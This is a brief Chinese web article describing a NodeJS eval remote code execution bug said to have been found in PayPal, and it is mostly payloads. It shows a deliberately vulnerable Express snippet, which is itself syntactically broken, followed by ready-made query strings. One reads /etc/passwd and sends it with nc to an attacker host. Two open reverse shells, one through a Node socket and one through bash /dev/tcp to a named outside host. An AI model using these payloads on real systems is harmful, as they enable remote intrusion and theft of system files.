NodeJS远程代码执行

@Artsploit在挖PayPal的漏洞时,发现一处NodeJS代码执行,奖励$10000美金。

测试

var express = require('express'); var app = express(); app.get('https://www.jb51.net/', function (req, res) { res.send('Hello eval(req.query.q)); console.log(req.query.q); }); app.listen(8080, function () { console.log('Example listening on port 8080!'); });

任意文件读取

:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

您可能感兴趣的文章:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wzfjzx.html